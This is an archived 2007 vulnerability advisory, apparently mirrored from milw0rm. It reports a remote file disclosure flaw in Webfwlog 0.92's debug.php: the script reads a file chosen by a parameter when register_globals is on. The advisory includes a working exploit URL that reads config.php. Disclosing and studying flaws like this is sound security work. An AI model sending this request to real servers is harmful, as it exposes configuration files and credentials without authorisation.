Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability

2007-01-29T00:00:00
ID SECURITYVULNS:DOC:15894
Type securityvulns
Reporter Securityvulns
Modified 2007-01-29T00:00:00

Description

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz + D.Scrpit:http://webfwlog.sourceforge.net/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + V.Code In : /include/debug.php | php.ini -> register globals = on ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + readfile("$conffile"); ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + 3xpl0!t ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + /include/debug.php?config[debug]=10&conffile=config.php ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Author: GolD_M <hacker_ [at] w.cn> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

milw0rm.com [2007-01-29]